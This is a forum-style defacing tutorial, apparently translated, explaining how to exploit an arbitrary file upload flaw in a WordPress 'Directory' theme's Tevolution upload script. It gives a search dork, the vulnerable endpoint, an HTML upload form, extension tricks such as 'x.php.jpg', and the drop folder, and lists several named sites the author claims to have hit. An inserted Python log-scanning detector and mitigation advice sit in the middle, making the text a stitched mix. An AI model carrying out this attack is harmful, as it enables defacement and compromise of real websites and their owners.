Evening guys :D , this time I'm going to share a tutorial on defacing through the WP "Directory" theme's Arbitrary File Upload Vulnerability :v , no need for small talk, just take a look at the tutorial below:
Dork: inurl:/wp-content/themes/Directory/
Find a target first, then put in this exploit :V
Exploit: Target.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
CSRF:
<form
action="target.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>
*Save the CSRF with a .html extension :D
If it's vulnerable, the exploit page comes up blank :v
If it's not blank / 404 not found, just let it go :V
Live target, bro :D :
Here's my target: http://littleitalycollegest.com/
Add the exploit: http://littleitalycollegest.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
Vuln, brooo :D
"Blank means vuln", as in the picture above :D
Then put your target into the CSRF above, replacing target.com with your target :v
Once that's done, pick your file:
Upload Your File: yourfile.php.jpg / yourfile.php.txt / yourfile.txt.
If a number shows up, that means your file has been uploaded successfully :D
wkwkwkwk
Access the file at: target.com/wp-content/themes/Directory/images/tmp/
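The upload endpoint and drop directory described above are exactly what a site owner should be watching for in the web server's access log. The script below is an added example, not part of the original post: it scans constructed Apache combined-format log lines (the IPs, timestamps and the 1478610783_x.php.jpg filename are made up) for any request to the Tevolution single-upload.php endpoint and for fetches of timestamp-prefixed files carrying a script extension from the Directory theme's images/tmp folder.

```python
import re

# Constructed Apache combined-format log lines for illustration (not from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [08/Nov/2016:12:33:03 +0000] "GET /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Nov/2016:12:33:10 +0000] "POST /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php HTTP/1.1" 200 10 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Nov/2016:12:33:15 +0000] "GET /wp-content/themes/Directory/images/tmp/1478610783_x.php.jpg HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Nov/2016:12:40:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Upload endpoint and writable directory named in the write-up.
UPLOAD_ENDPOINT = ("/wp-content/plugins/Tevolution/tmplconnector/monetize/"
                   "templatic-custom_fields/single-upload.php")
TMP_PATH_RE = re.compile(r"^/wp-content/themes/Directory/images/tmp/\d{10}_[^/]+$")
# A server-side script extension anywhere in the name (x.php, x.php.jpg, x.phtml.txt ...).
EXEC_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def find_upload_abuse(log_text):
    """Return one alert dict per suspicious request, in log order."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        method, path, status = m["method"], m["path"], int(m["status"])
        path_only = path.split("?", 1)[0]
        reason = None
        if path_only == UPLOAD_ENDPOINT:
            # Any hit on the unauthenticated uploader is worth a look; a POST is the upload itself.
            reason = "upload_post" if method == "POST" else "upload_probe"
        elif TMP_PATH_RE.match(path_only) and status == 200 and EXEC_EXT_RE.search(path_only):
            # Someone successfully fetched a freshly dropped file with a script extension in its name.
            reason = "tmp_script_fetch"
        if reason:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "method": method,
                           "path": path_only, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in find_upload_abuse(SAMPLE_LOG):
        print(a["ts"], a["ip"], a["reason"], a["path"])
```

Removing or access-restricting the upload script and making images/tmp non-executable (for example, denying PHP handlers there) closes the hole the alerts point at.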
My results :D
http://littleitalycollegest.com/wp-content/themes/Directory/images/tmp/1478610783_x.txt
http://majelis.info/wp-content/themes/Directory/images/tmp/1478355985_x.txt
http://www.hoboken-bar.net/wp-content/themes/Directory/images/tmp/1478412279_x.txt
http://cambodiapages.info/wp-content/themes/Directory/images/tmp/1478412649_x.txt